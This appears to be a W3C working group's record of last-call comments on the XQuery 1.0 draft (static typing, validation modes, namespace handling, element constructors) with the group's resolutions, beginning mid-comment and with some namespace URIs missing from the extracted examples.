a) The XQuery language specification itself specifies a violation of one of these constraints. Of course, we are fallible and mistakes happen, but presumably the working group will endeavor to fix any such inconsistencies when they are reported.
b) The initialization of the static and dynamic context provides an inconsistent 'start state' for XQuery expression evaluation. This can be handled in either of two ways: i) by specifying that the XQuery implementation shall begin by checking its static and dynamic context for violations and report any violations as exceptions; ii) that might be regarded as too much overhead, so you might prefer to specify 'lazy' constraint checking, only checking a value when the value is referenced, or some aspect of a value is referenced.
c) The violation occurs dynamically during expression evaluation. This can be handled by specifying that the constraints shall be checked whenever a value is constructed.
- Steve B. 46. +qt-2004Feb0587-01 ORA-XQ-080-C: Enforcement of consistency constraints. Andrew: It may be a duplicate from another comment (????). Don had an item regarding a solution. Add a sentence on top of the consistency constraints paragraph. This issue is closed as resolved by ORA-XQ-217-C. No further action required.

SECTION 2.2.3.2: dynamic evaluation phase Second para, last sentence: this sentence makes the Static Typing Feature all-or-nothing, precluding what I will call a partial implementation of the Static Typing Feature, in which an implementation detects and raises some, but not all, type errors, and does not progress to the dynamic evaluation phase if it finds a type error. This does not appear to do the user any good.
It means that if the implementation does not do a total job of type error checking, then effectively it has not done any at all (except to raise warnings). I think it would be better to say "if the Static Typing Feature is not in effect, then it is implementation-defined what type errors are detected and raised during the static analysis phase, aborting the dynamic evaluation phase." - Steve B. 45. +qt-2004Feb0585-01 ORA-XQ-078-B: XQuery should permit partial static typing.

SECTION 2.2.3.1: Static analysis phase Sixth para: "if the Static Typing Feature is in effect and the static type assigned to an expression other than () is empty, a static error is raised." Does this mean that "let $i = ()" is a static type error? - Steve B. 44. +qt-2004Feb0583-01 ORA-XQ-076-C: Is "let $i = ()" permitted? SECTION. 43. +qt-2004Feb0576-01 ORA-XQ-073-C: "available documents is not constrained by ... statically known documents".

SECTION 2.1.1: Static context Statically known collections: it says that the default type of a collection is node()?. But in 2.3.4 "Input sources" it says that the result of invoking fn:collection can be "any sequence of nodes", that is, node()*. - Steve B. 42. +qt-2004Feb0565-01 ORA-XQ-069-E: what is the default type of a collection? Issue closed with no further action. The default type of a collection should be node()*.

SECTION 2.1.1: Static context In-scope collations: it says that a collation "may be regarded as an object that supports two functions...". In F&O section 7.5 "Functions based on substring matching", fourth paragraph, it says "For other functions, such as fn:contains(), the collation needs to support an additional property: it must be able to decompose the string into a sequence of collation units...". This "additional property" appears to be the same as the second of the two functions in a collation object. The choice of the words "it must be able to..." in F&O suggests that F&O regards the presence of this second function as optional. Also, in F&O 7.5.1 "fn:contains", second para, last sentence, it says "If the specified collation is unsuitable ... an error may be raised." What would make a collation unsuitable? The reader is left with the impression that one thing that might make a collation unsuitable is if the collation does not support the second function. (Some other possibilities are mentioned in F&O 7.31 "Collations", including issues with normalization.) Summary: please clarify whether the second function is a mandatory or an optional part of a collation object. I am entering separate comments asking to clarify some of these points in F&O as well. - Steve B. There was a feeling we had already dealt with this issue or others like it. KK pointed to 2004Feb0990-01, an F+O issue, "Please define collations", which was accepted and closed in August. JM: Please tell the meeting that it is my opinion that the changes we accepted for "minimal matching" should resolve this question for the purposes of F&O at least, and I think we've otherwise satisfactorily defined collations. KK: would it be good for the language book to contain a reference to the F+O definition. RESOLVED: no action required, DC to consider making a cross-reference to the F+O definition.

SECTION 2.1.1: static context Regarding in-scope namespaces, an implementation should be allowed to predefine some namespaces for the convenience of the intended user community.
Such namespaces might be used to reference types and functions that are supplied with the product, for example. Naturally, these should be implementation-defined namespaces (ie, documented to the end user). It would be helpful to say explicitly that there may be implementation-defined namespaces among the predefined namespaces. - Steve B. AE: Points out that this is given in normative appendix C.1. RESOLVED WITH NO CHANGE. See 4.11 Namespace Declaration, which lists them. Also C.1.

SECTION 2: Basics First sentence: "... the expression, which is a sequence of Unicode characters." Certainly in order to support XML, an implementation will need to support Unicode in its data values, but is this necessary in a source language expression? SQL (ISO/IEC 9075) distinguishes what it calls "the source language character set", which is not necessarily the same as any character set in the data. Of course, XQuery expressions can include literals for Unicode strings, and XQueryX, being expressed in XML, is necessarily expressed in Unicode as well. But wouldn't it be sufficient for XQuery to allow the source language character set to be any implementation-defined character set, provided there was an implementation-defined mapping to convert the source language into Unicode? For example, if a user is working in an environment with EBCDIC or Shift-JIS editors, the user will probably want to compose his XQuery expressions in those character sets. - Steve B. See [441]. RESOLUTION: we've been here before, closed with no further action. ADOPTED RESOLUTION: ACTION-ITEM-177-02: Jim Melton to provide proposed wording. DONE. See: Add a sentence (actually, an Informative Note) following the first sentence of the first paragraph in Section 2, "Basics". That new sentence/note should read "Note: This specification makes no assumptions or requirements regarding the character set encoding of strings of Unicode characters."

SECTION 2.2.3.1: Static Analysis Phase "The operation tree is then normalized by making explicit the implicit operations such as atomization, type promotion and extraction of Effective Boolean Values (step SQ5)." In step SQ6, there is a static type checking phase. In SQ5, if the type checking (step SQ6) has not occurred, how can it do 'type promotion', which requires type information on the operation tree? Does this mean SQ5 and SQ6 are not done sequentially in order? Probably need to iterate between 5 and 6? - Steve B. MR and JS explain the way it is done by normalization. It can be done sequentially or not. The formal semantics does it sequentially. MR: Have the pointer to formal semantics, but do not change current wording. DC: pointer is already there. RESOLVED WITH NO CHANGE.

SECTION 2.2.5: Consistency Constraints There should be something here to say when these consistency constraints need to hold. For example, "All variables defined in in-scope variables must be defined in dynamic variables" won't be true until execution after all external variables have been bound. - Steve B. DC: Constraints define the circumstances under which XQuery is well-defined. So there is no way to define errors or detect it. This seems true for all except for the one referred to in +qt-2004Feb0548-01, which is only in this category for XPath. PC: Proposal: Make variable one XPath only. Add sentence to explain axiomatic nature.
JM: proposed wording: "This specification does not define the results of an XQuery[/XPath] expression under any condition where one or more of these constraints are not satisfied." MR: Just need to make sure that the variable alignment is not removed from XQuery. AE: This is still guaranteed by the section on dynamic context. ADOPTED RESOLUTION: Deleting bulleted item in Oracle comment for both. Adding Jim's proposed wording for both.

Section 3.13 Validate Expressions Technical The definition of lax validation is not aligned with the XML Schema definition of lax validation, which checks for presence in the ISSD on a level-by-level basis. This should be fixed. DC: Corrected in current editor WD. FIXED.

Section 3.13 Validate Expressions Technical We consider the validate expression (and the implicit validation on element construction) to be too complex and potentially confusing to users for the following reasons:
- Validate will validate against all ISSD. In most use cases we come across, users want to validate against a specific output schema. Since that can be done outside of the XQuery statement, the validate expression becomes less useful.
- The schema context part of validate is pretty complex and most users will not understand it at the beginning. This looks like a good vNext or optional feature.
Thus we would like to propose: 1. Make the default validation mode skip. 2. Remove schema context from the spec. 3. Make support for validation modes lax and strict and the validate keyword an optional feature. (See also MS-XQ-LC1-089.) Resolved by the following: 1. Make the default validation mode skip. 2. Remove schema context from the spec. 3. Make support for validation modes lax and strict and the validate keyword an optional feature. Action on Jonathan to move #3 as an issue in the conformance cluster.

Section 3.10 Conditional Expressions Technical As others, we would like to recommend making the else clause optional (defaulted to else ()) and adding an ending token (e.g. end, endif) to disambiguate the dangling else clause. Same as qt-2004Jan0378-01. PaulC: so, new evidence to make this decision? anybody that can't live with changes? Yes: at least Don, Robie. So, resolved: rejected. DC: else is still required. Was done at Mandelieu F2F and REJECTED. [[rejected]]

Section 3.8.3 Order By and Return Clauses Technical Provide an XQuery prolog statement affecting the static context to define the empty sort default. Michael R asks for an XQuery prolog statement affecting the static context to define the empty sort default. Proposal: declare default order empty [choices: least greatest]. Jim asked that the scope be made clear. Left to the editors. Don asked for approval of the following values and got it:
schema component name: default empty ordering for empty sequence
default predefined value: none
can it be overwritten by an implementation: yes
can it be overwritten by query: yes, by a prolog or orderby clause
scope: module resource
consistency rules: only one declaration per prolog
RESOLUTION: Resolved by the adoption of the proposal: declare default order empty [choices: least greatest]

Section 3.7.3.7 Computed Namespace Constructor Technical How can I declare a default namespace? I always have to provide the NCName. Can we make the NCName optional and then make it define the default namespace? This has been subsumed by a response to an earlier comment.

Section 3.7.3.5 Computed Processing Instruction Constructor Technical Why is the rule based on using QName values instead of NCName values?
We would prefer to raise a type error when a QName is provided. Some discussion to investigate impact of the proposed change. Since xs:NCName is a subtype of xs:string, we can just drop xs:QName. ADOPTED.

Section 3.7.3.5 Computed Processing Instruction Constructor Technical Also allow an instance of xdt:untypedAtomic as a name value. ADOPTED.

Section 3.7.3.1 Computed Element Constructor Technical "A computed element constructor automatically validates the constructed node, using the validation mode and validation context from its static context, as described in 3.7.1.5 Type of a Constructed Element. If the name of the constructed element is specified by a constant QName, this QName is added to the validation context for nested expressions. On the other hand, if the name of the constructed element is specified by a name expression, the validation context for nested expressions is set to global.": The fact that the validation context stays global inside a constructor that has a name expression will be confusing and hard to explain. Users will expect that the validation is done at runtime, so the validation context in this case should be a runtime context. We can solve this by either not doing implicit validation on element construction (regardless of whether it is a literal or computed element constructor), or by saying that the context will not be known until runtime in this case.

Section 3.7.1.5 Type of a Constructed Element Technical "constructed element has an attribute that causes it to be validated as an integer:": This is only true if the validation mode is lax or strict and no conflict exists. If a conflict exists, then an error is raised, and if the validation mode is skip the value is still untyped. DC: This sentence has been removed by an action item from Mandelieu to reword this section. Comment has been RESOLVED, please check the new section.

Section 3.7.1.5 Type of a Constructed Element Technical We believe that implicit validation on element construction (and validation in general) adds considerable complexity to XQuery. However, there is still value in having input data typed. Therefore we propose to decouple validation from schema import and either remove validation from XQuery or make it a separate optional validation feature (which then may also add the validation mode preserve). Thus, an implementation would only have to support the semantics of validation mode = skip in the base conformance. RESOLUTION: Closed. No action required. Overtaken by events.

Sections 3.7.1.3/3.7.3.3 Technical "If the content sequence contains a document node, a type error is raised.[err:XQ0023]": There are several use cases where people want to put a wrapper around a document (see SQL-2003 SQL/XML and others) and just want to write <a>{fn:doc(...)}</a>. We thus propose that we allow this scenario by automatically dropping the document node and inserting copies of all the nodes under the document node into the new element. Accepted and closed by adopting the following proposal: Content of element constructors, computed element constructors, and document node constructors no longer raise errors for document nodes - instead, the contents of the document node are copied into the content of the constructed element or document.
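To make the adopted behaviour concrete, here is a minimal sketch of my own (the wrapper element name and the input document name are illustrative, not taken from the spec):

    <archive>{ fn:doc("dom-issues.xml") }</archive>

Under the adopted proposal this no longer raises err:XQ0023: the document node returned by fn:doc is not itself copied; instead its children become the content of the new archive element.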
Sections 3.7.1.3/3.7.3.1/3.7.3.3 Technical "Copied element nodes are given the type annotation xs:anyType, and copied attribute nodes are given the type annotation xs:anySimpleType.": assuming no validation is done, the type annotations should be xdt:untyped and xdt:untypedAtomic respectively. Changes earlier resolution. MRys: If no validation, we get xdt:untyped and xdt:untypedAtomic. AE: In the latest wording this change may have been made. Editors to check wording in 3.7.1.3, 3.7.3.1, 3.7.3.3 and fix. Seems like it is already done. Andrew confirmed.

Section 3.7.1.3 Content Technical "Predefined entity references and character references are expanded into their referenced strings, as described in 3.1.1 Literals. Each consecutive sequence of literal characters evaluates to a single text node containing the characters. However, if the sequence consists entirely of boundary whitespace as defined in 3.7.1.4 Whitespace in Element Content and the Prolog does not specify xmlspace = preserve, then no text node is generated.": As in comment MS-XQ-LC1-082, we should not expand whitespace entities before we apply whitespace handling/normalization rules. Also, some of the XML element content whitespace normalization rules are missing.

Section 3.7.1.2 Namespace Declaration Attributes Technical Namespace declaration attributes should not affect the in-scope namespace static context for expressions. We think that only the ones in the prolog should affect the namespace prefixes inside expressions. We find the following semantics to be confusing: declare namespace b = "uri1"; <a xmlns:b="uri2">{/b:c}</a> will look for {uri2}c and not {uri1}c. "uri2" should only affect the construction part. The same should then also hold for the computed constructors. Thus, we would like to have the following behaviour: Namespace declaration in prolog: provides static namespace prefix bindings for both constructors and expressions. Namespace declaration on construction: provides static namespace prefix bindings for constructors only, not for embedded expressions. AE: Let's not make things more complex. MRys: Dana said the notion of scope is underspecified. PC: This is a technical change and there has been some pushback. PC: There is no support for the MS position but better text and an example would be good. RESOLVED: Add examples but no change to the behaviour.

Section 3.7.1.1 Attributes Technical Replace "The value of the size attribute is "7"" with "The value of the size attribute is xdt:untypedAtomic("7")". In both examples, assuming no validation. > > Status: See Don's request for review: > DC: Made fix to talk about string value and requests that this fix is accepted instead of resolution of MS-XQ-LC1-083 in meeting 175. MR: Can live with this. Don's request is ACCEPTED. MRys: Editorial assuming no validation during attribute construction. RESOLVED: Fix as suggested.
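A small sketch of the point at issue, in my own words (assuming no schema validation of the constructed element; the shoe element is a hypothetical example):

    let $e := <shoe size="7"/>
    return ( string($e/@size),                                   (: the string value "7" :)
             data($e/@size) instance of xdt:untypedAtomic )      (: true: the typed value is xdt:untypedAtomic("7") :)

That is, the attribute's string value is "7", while its typed value is xdt:untypedAtomic("7") rather than an xs:string, which is the distinction the requested rewording makes explicit.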
Section 3.7.1.1 Attributes Technical "Predefined entity references and character references in the attribute content are expanded into their referenced strings, as described in 3.1.1 Literals. Each consecutive sequence of literal characters in the attribute content is treated as a string containing those characters. Whitespace in attribute content is normalized according to the rules for "Attribute Value Normalization" in [XML 1.0] (each whitespace character is replaced by a space (#x20) character.)": Often whitespace in attribute values is entitized to avoid the attribute value normalization. By doing expansion first, we lose this capability and lose the ability to preserve certain whitespace characters. This should be fixed. This has already been REJECTED and publicly announced in WG Resolution: Jonathan to update issues list. MRys: By expanding entities early we lose the ability to maintain some whitespace characters. PC: Need exact text. MRys: Follow XML 1.0 text or do whitespace normalization first and then expand entity references. AE: In section 3.7.1.1 interchange rules 1 and 2. RESOLVED: Implement AE suggestion above. Attn: Don C.

Section 3.2.1.2 Node Tests Editorial Remove reference to namespace node (there is no way to perform a node test on it in XQuery). JR: This has been done. The offending text no longer occurs.

XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 3.1.6 XQuery Comments "Comments may be used anywhere ignorable whitespace is allowed. See A.2 Lexical structure for the exact lexical states where comments are recognized." In the following queries, a comment is placed where ignorable whitespace would appear to be allowed, but where the A.2.2 machine has no transition on "(:". So which is correct? Does the comment cause a syntax error or not?
node( (:test:) )
processing-instruction( xml-stylesheet (:test:) )
element( person (:test:) )
element( hospital / (:test:) staff / person )
<shoe (:test:)
<fact>I saw 8 cats.</fact (:test:) >
9 cast (:test:) as hatsize
-Michael Dyck Proposal accepted.

XQuery: specification unclear Section: 3.7.1.2 paragraph two says: "A namespace declaration attribute is used inside a direct element constructor, and serves to add a namespace to the in-scope namespaces for the constructed element, or to specify the default element/type namespace within the scope of the constructed element." What does it mean "within the scope of the constructed element"? Does the scope refer to the XML forest rooted at the given element constructor, or the XQuery expressions that are lexically placed within the "{" and the "}"? Or both? This is a very important point and the notion of "scope" is too fuzzy. Status: Related to several other comments on namespaces: FEB0210, FEB0211, FEB0207 and Microsoft LC-128. AE: Section 3.7.1.2 explains this better now. PC: Thus, Dana's problem has been fixed by this new text. No further action required.

XQuery: syntax simplification request Why is the Expr optional on production [105]? If the expression is not present the entire text constructor returns the empty sequence, so why support this syntax? Adopt the proposal. Dana: why does the computed text constructor have an optional expr as opposed to the comment constructor etc. where expr is mandatory. ADOPTED.

XQuery: incomplete specification Sections 3.7.1 and 3.7.3 discuss the base-uri property of the new nodes but do not say what should happen when the static context has no base uri defined.
Don showed that the question asked in this comment is addressed in the XQuery spec: section 3.7.1.3, Content, rule 5.b, and section 3.7.3.1, Computed Element Constructors, rule 4.b, answer this question. The comment was probably valid in the Last Call Working Draft, but it has been resolved in the current Working Draft. RESOLUTION: Comment qt-2004Feb0453-01/BEA_028 is resolved with no changes to the document.

XQuery: (potentially) editorial Section 3.1.5 (Function calls), when it describes the function conversion rules, says that in the case of a function invocation from a different module the type test has to be true in both modules. This is surprising. Does this mean that we are allowed to write in a library module: define function f($x as ns:shoeSize?) (: ns:shoeSize derives from xs:integer here :) {()} while the importing module contains: declare external variable $y as ns:shoeSize?; (: ns:shoeSize derives from String here :) f($y) and have the call f($y) succeed if $y is bound to the empty sequence? This is surprising. Did I misunderstand something? If this is not allowed, where is the text that forbids this case? (maybe) See Add the constraint: For every definition found in the in-scope schema definitions (ISSD) of a module resource, if it is found in another module resource used in the same query, then its definition must be the same as its definition in the other module resource. Scribe note: The mail says "module" but the term was changed to "module resource" by another decision made at this meeting. The Editor can reword this.

XQuery: incomplete specification, request for clarification The XQuery specification does not seem to require that all the in-scope schema definitions that are referred to in a variable type declaration or a function signature of an imported library module have to also be in scope in the importing module. Moreover, the XQuery specification does not seem to impose any consistency constraints between the in-scope schema definitions in the static context of a main module that imports a library module and the in-scope schema definitions with the same names in the library module. Both should be required as consistency constraints, and stated in section 2.2.5. Subsumed by qt-2004Feb0448-01; partly answered by an existing constraint, and also the new constraint added for qt-2004Feb0448-01.

I don't see the need for this 'local' namespace. Why was it introduced? Regards, Martin. It's to permit users wanting to define functions not to need to declare a namespace. ACTION A-CHINOOK-15: Jonathan Robie to reply. Agreed: A document node constructor is the only way to create a document. Agreed: Within XQuery, document nodes are not created implicitly. Serialization does implicitly convert to a document. Agreed: Our data model needs the flexibility to be able to create documents with multiple root nodes. ACTION A-173-07: Jonathan to respond to Martin. Decided: The issue is resolved.

Rule [17], EscapeQuot, should say /* ws: significant */, I guess. Regards, Martin. Proposal accepted.

We now have an appendix about application/xquery. RESOLVED: qt-2004Feb0415-02 closed. ACTION A-216-09 Liam will reply to qt-2004Feb0415-02 [done]

[3] 3.1.1 Literals, entity/character references: After careful examination, this works out. But it would be good to have a section explaining how character escaping works in XQuery overall, including differences and similarities to XML and XPath. This comment asks for an overview; the comment is therefore editorial.
DC: we enumerate the different cases and give the syntax; it's hard to see what else we should do. RESOLVED: we feel the spec is unambiguous, we don't feel a need to add further tutorial information at this stage. AE will respond to Martin. Issue closed with no action.

[4] The special conventions for escaping quotes (production [17]), apostrophes ([25]), and curly braces (should probably also be a production of its own) may not be necessary. Character references should be used; for convenience, named character references for { and } could be defined. R: Martin isn't claiming there's anything broken by the current mechanism, but that we could just use character references. AE: we did have a reason for doing what we did: MKay had argued that XPath expressions inside XSLT are going to be processed first as XML and then by the XPath processor. JR: I can't see making a change like this at this point. JM: I'm hearing consensus to respond saying we did this for good reason and see no good reason to change.

> qt-2004Feb0415-06 [XQuery] I18N last call comments This (qt-2004Feb0415-06) was RESOLVED at the Redmond F2F and meeting 199. DC: I believe we have already processed this issue, or something like it. The current rules for whitespace in attribute constructors reflect the intent of what is requested. JR: appears to be a duplicate of Feb0490-01 (MRys comment). RESOLVED. Duplicate of Feb0490-01, which we accepted. Jonathan will respond to this effect.

[8] 3.7.1.3 Content (and other places): serializing atomic values by inserting spaces may not be appropriate for Chinese, Japanese, Thai, ..., i.e. languages that don't use spaces between words. This has to be checked very carefully. JR had some email interchange with Martin Duerst about spaces separating tokens in programming languages not being the same as in natural languages. The reason the white space is there is for round-tripping sequences.

[9] There should be more non-US examples. For example, it is very difficult for somebody not from the US to understand why there are no Deep Sea Fishermen in Nebraska. DECISION: To not ask the editors to make changes solely for the purposes of this comment, but to do so on an opportunistic basis only. We've asked the editors to consider rephrasing examples in non-US terms when they have the opportunity, but there are no plans to make revisions unless we learn of examples that are particularly unclear.

[10] 3.7.2: Not requiring CDATA constructs to be serialized as CDATA sections is a good idea, because it helps dispel the idea that CDATA sections are semantically significant. Overtaken by events; we no longer have CDATA sections in the data model.

[11] 3.7.3.1, example using 'lang' attribute: Please replace this attribute with xml:lang, and its values with 'de' and 'it'. JR: he's right in both cases, this example should be changed. DECISION: To adopt the change proposed in the comment. ACTION A-216-03 Don to make the change and reply to qt-2004Feb0415-11. RESOLVED: qt-2004Feb0415-11 accepted.

[12] 3.7.3.4: Why is there a need for a 'text' node constructor? What's the difference between this and a string (there should be none, or as few as possible). > h) qt-2004Feb0415-12 [XQuery] I18N last call comments JR: one thing that's very hard to do is to create an untyped string - you have to know the name xdt:untypedAtomic, but this turns out to be common. We have constructors for all of our node types. DECISION: That no change is required to the documents in response to this comment.
RESOLVED: qt-2004Feb0415-12 closed with no change. ACTION A-216-04 JR to respond to qt-2004Feb0415-12.

[PC] Latest message is under: This proposes a new grammar for URILiteral. [MichaelK] Is that needed in XPath? [ScottB] I believe this is used in one place. *** Proposal to add a URILiteral in the grammar is adopted. *** This resolves Issue qt-2004Feb0415-13. LIAM to respond to I18N working group.

[14] 3.8.3, last example: Instead of 'collation "eng-us"', something that looks more like a URI should be used. DECISION: To make a change based on the comment. ACTION A-216-06 Don will fix, using, and respond to the comment. RESOLVED: qt-2004Feb0415-14 accepted.

[15] 3.12.2 Typeswitch: There should be an example that shows how to deal with strings, complex types without any actual markup contained, and complex types with markup (e.g. <ruby> or similar). Don: we have one example in typeswitch, using the type of an address element. DECISION: No support for making a change -- the language book is not a tutorial. RESOLVED qt-2004Feb0415-15 rejected.

We won't put this in the prolog; in general, we won't put serialization parameters in the prolog (leave it implementation-defined/API-defined). ACTION A-208-03: MRys will write a proposed reply for qt-2004Feb0415-16, and then SteveB will review it and send it to Martin.

[17] Note at the end of 4.6: re. DTD treatment, this should very clearly say what happens (or doesn't happen) with entities, or point to the place where this is defined (data model)? Andrew: this was at the end of the schema import section; the note at the end of the section talked about DTD-validated documents, suggesting converting DTDs to W3C XML Schemas. In our latest document that note no longer exists. The XQuery language document no longer mentions DTD. The data model 3.2 says, "All general and external parsed entities must be fully expanded", which answers this comment. RESOLVED: qt-2004Feb0415-17 closed. Liam to reply (done).

[18] It would be very good if it were possible to declare default collations for part of an XQuery. MaryH: I don't see any good way to do this. AE: we've chosen to provide prolog directives and not to provide expression-by-expression directives. Liam: this would have implications on separate compilation of modules, if you could say, with default collation foo, call function module:x. Maybe in a later version. DECISION: No changes to the language (at least in V1.0) in response to this comment. RESOLVED: qt-2004Feb0415-18 rejected.

[19] There should be a way to character normalize nodes (not only strings). This could easily be achieved by overloading fn:normalize-unicode. This will help in cases where otherwise fn:normalize-unicode would have to be used all over the place. Serialization parameters are more appropriate for this. JR will respond.

[20] The XML version for output seems to be fixed to 1.0. There needs to be a way to output XML 1.1. (how to output XML 1.1?) JR: the supported version of XML is now implementation-defined (decided on the August 11th telecon). JR will respond to Martin.

It is not too difficult to predict that typing will be a headache for many people for XQuery and XSLT2. Please do anything and everything that you can to reduce the problems. The different concepts around types, the different types, the different rules for conversion,...
will make typing very difficult to use. It would be very good to have some section (maybe an appendix) summarizing all the rules, and giving people a chance to get an overall grasp. Giving parallels e.g. to well-known programming languages (if and where they exist) may also help. Another issue is that it is not completely predictable, and not completely interoperable, which XML Schemas will be taken into account and which not. XQuery Schema Import does a lot to make this more predictable, but this should be completely predictable. 'augmentable by implementation' does not lead to interoperability. A typical example of this is the "implementation-dependent mechanism for determining whether an unknown type is compatible..." in 2.4.4 of XPath. Regards, Martin. Yes, typing is a headache. We are doing what we can to make it easier, but it is hard to understand, and involves difficult concepts. We expect books and articles to clarify this, our spec needs to be clear, but it will not be a tutorial. Implicit schema import is needed in some environments that need type safety but do not support explicit schema import. It is always possible to explicitly import schemas for interoperability. Implementations that can access dynamic type information should be allowed to use this information even though purely static implementations can not. This is why we have chosen to allow an implementation-defined mechanism that can utilize type hierarchies not available in the static context. For many applications, namespace node preservation is overweight. For others, it is needed. The current definition of XQuery can easily result in large numbers of superfluous namespace nodes, especially when querying documents that use several namespaces. Consider the following data, taken from the DOM Issues List: <issues xmlns: <header> <title>DOM Level 3 Core Issues List</title> <!-- SNIP --> </header> </issues> Now consider the following query, applied to this data: <out> { doc("dom-issues.xml")/issues/header/title } </out> Here is the result, according to our current spec: <out> <title xmlns:DOM Level 3 Core Issues List</title> </out> Although none of these namespaces are actually used in the title element that was retrieved, our current specification require that all namespaces in scope in the original document must be in scope for the copied element in the constructed element. Now suppose that we create several namespace-decorated documents like this one, and perform an XQuery that copies from each of these to create a new document with even more namespaces... Naturally, we do need to ensure that namespaces are preserved if they are used in element names, attribute names, or QNames. Consider the following query: doc("dom-issues.xml")/issues//originator The result must preserve the above-mentioned namespaces to allow correct interpretation: <originator xlink:type='simple' xmlns:Christopher Aillon</originator> There are also XML vocabularies, such as XML Schema or XSLT, that use QNames in content, and for these, all QNames really must be preserved. I think we should provide two modes of operation: 1. Namespace preserving copy keeps all namespace nodes 2. Normal copy keeps only namespace nodes used in element names, attribute names, or instances of xs:QName. 
One possibility would be to declare this at a global level: declare namespace-preserving = "true"; Another possibility would be to declare namespace preservation for specific namespaces: declare namespace-preserving = "", ""; Either of these would reduce the overhead associated with copying elements significantly in some implementation environments. Jonathan RESOLUTION: This resolves qt-2004Feb0285-01 [XQuery] 3.7.4 Namespace nodes on constructed elements The comment came from Jonathan, so no need to respond. (IBM-XQ-015) XQuery currently defines three validation modes: strict, lax, and skip, based on the three validation modes of XML Schema. In skip mode, no validation is applied to a newly-constructed element. Instead, the new element node (and each of its descendant elements) is given the annotation xdt:untyped, and its attributes (and the attributes of its descendants) are given the annotation xdt:untypedAtomic. If the content of the new element is copied from existing nodes, the types of these existing nodes are lost. An XQuery implementation that does not support Schema Import will probably run in skip-validation mode, since validation is meaningful only if a schema is present. Nevertheless, such an implementation may wish to preserve the type annotations on nodes in input documents, since these type annotations may affect the processing of a query (for example, 17 > 5 is true for the xs:decimal type but not for the xdt:untypedAtomic type). The loss of type information during skip validation causes a serious problem for applications that need to "wrap" an element in a higher-level "envelope" element. The wrapping is done by referencing the "content" element inside a constructor for the "envelope" element, causing the content element to be copied and validated. It is quite possible that the "content" element may not be defined in the in-scope element declarations. This may happen if the current application is a generic message-routing application that does not find it practical to import the schemas for all possible contents. It will also happen in systems that do not implement the Schema Import feature. In these cases, skip-validation causes the loss of the type information on the "content" element. Here are some examples of this problem (assuming skip validation in each case): (a) Copy a set of "customer" elements into newly-constructed "rated-customer" elements, pairing each customer with a rating. Now order all the rated-customers by balance-due. Balance-due was originally decimal, but now its type has been lost and 5 is sorted as greater than 17. (b) Write an application to extract data from an XML document and wrap it in <row> and <col> tags for interfacing to a relational database. By wrapping the data in <row> and <col> tags, its original types are destroyed and all the data appears to be text. Again, data that was originally decimal will be sorted incorrectly. (c) If a query-rewrite pushes a predicate inside a constructor, the effect of the predicate is changed because the expression inside the constructor is typed but outside the constructor it is not. This limits the ability of the system to do query optimization and to merge queries with view definitions. The solution to these problems is to introduce a new validation mode called "skip preserve", or simply "preserve". In this mode, no validation is attempted, and the type annotation of the subject element remains unchanged rather than being set to xdt:untyped. 
Adding this validation mode would not affect the definitions of the existing three modes. The following changes would be made to the XQuery specification by this proposal:
(a) In Section 2.1.1, Static Context: In the definition of Validation Mode, add "preserve" or "skip preserve" to the list of modes.
(b) In the grammar production for ValidationMode, add a keyword for the new option.
(c) In Section 3.7.1.3, Direct Element Constructors--Content: Rule (1d) should be changed as follows: "If the validation mode is "preserve", copied element and attribute nodes retain their original type annotations; otherwise, copied element nodes are given the type annotation xdt:untyped, and copied attribute nodes are given the type annotation xdt:untypedAtomic."
(d) In Section 3.7.1.5, Direct Element Constructors--Type of a Constructed Element: Add the following initial sentence: "A direct element constructor assigns the initial type annotation xdt:untyped to the newly constructed element node. It then validates the new node, using the schema validation process defined in XML Schema." Also in Section 3.7.1.5, change the first bullet as follows: "If validation mode = skip or preserve, no validation is attempted. The constructed element retains its type annotation of xdt:untyped, and its attributes and descendants retain the type annotations assigned to them during construction."
(e) In Section 3.14, Validate Expressions: Add the following bullet to the three bullets that define strict, lax, and skip validation: "preserve indicates that no validation is to be attempted, but that element nodes and attribute nodes are to retain their original type annotations."
(f) In Section 4.6, Validation Declaration: Add "preserve" to the list of validation modes.
Note that these changes will align XQuery with XSLT 2.0, which has already introduced the concept of validation="preserve" as documented in. The XSLT 2.0 definition of validation="preserve" is consistent with the definition above, and these definitions should be kept consistent. --Don Chamberlin

(IBM-XQ-011) Section 3.14 (Validate Expression) states that validating a node destroys its identity. I believe that this issue needs more thought. The reason for giving a new identity to a validated node is that some of its contents may change (for example, default attributes may appear). But consider the following:
(a) The validated node has the same parent as the original node, right? Doesn't this mean that the content of the parent node has changed? If the parent node can retain its identity, why can't the validated node retain its identity?
(c) Requiring validation to generate new node identities also raises questions about Requirement (3.4.13) that queries must be able to preserve the identity of items in the Data Model.
(d) Requiring validation to generate new node identities also may place an unnecessary burden on implementations that perform incremental validation on the data model rather than serializing it and revalidating the whole tree from scratch.
(e) Suppose $n is bound to an element node. Is "$n is validate{$n}" true? Is "$n/.. is validate{$n}/.." true? If the answers are not the same, why not? --Don Chamberlin
Dana: This would add side effects to the language. XQuery would no longer be a functional language. None of the traditional optimizations would hold. Answers to Don's questions:
(a) The validated node has the same parent as the original node, right? Doesn't this mean that the content of the parent node has changed?
If the parent node can retain its identity, why can't the validated node retain its identity? Agreed: If a node is validated, it no longer has a parent. Agreed: In-place validation, which is needed for updates, is different from the validation XQuery currently does.
(c) Requiring validation to generate new node identities also raises questions about Requirement (3.4.13) that queries must be able to preserve the identity of items in the Data Model. Agreed: There is no requirement that every operation in XQuery preserve identity, merely that it is possible for a query to return nodes, preserving identity.
(d) Requiring validation to generate new node identities also may place an unnecessary burden on implementations that perform incremental validation on the data model rather than serializing it and revalidating the whole tree from scratch. Agreed: There are ways to do this under the covers.
(e) Suppose $n is bound to an element node. Is "$n is validate{$n}" true? Is "$n/.. is validate{$n}/.." true? If the answers are not the same, why not? Agreed: We can live with the status quo on this. Some disagreement with what that answer is. Jonathan believes the answers are "false" and "()", respectively.

(IBM-XQ-009) Section 3.7.1.5 (Type of a Constructed Element) uses the following example: <a xsi:type="xs:integer">47</a> But Section 3.7.4 (Namespace Nodes on Constructed Elements) says that a similar example is not valid: <p xsi:3</p> This illustrates an error that many users will make. The namespace "xs" that contains all the built-in schema types is not in scope for a constructed element unless it is explicitly declared. We need to correct the inconsistency between the two sections noted above. This can be done in either of the following ways:
(a) We can make a rule that the "xs" namespace, like the "xml" namespace, is automatically in scope for all constructed elements. I recommend this approach, because I believe that the justification for "xs" is at least as good as for "xml". This will remove a common source of errors and frustration.
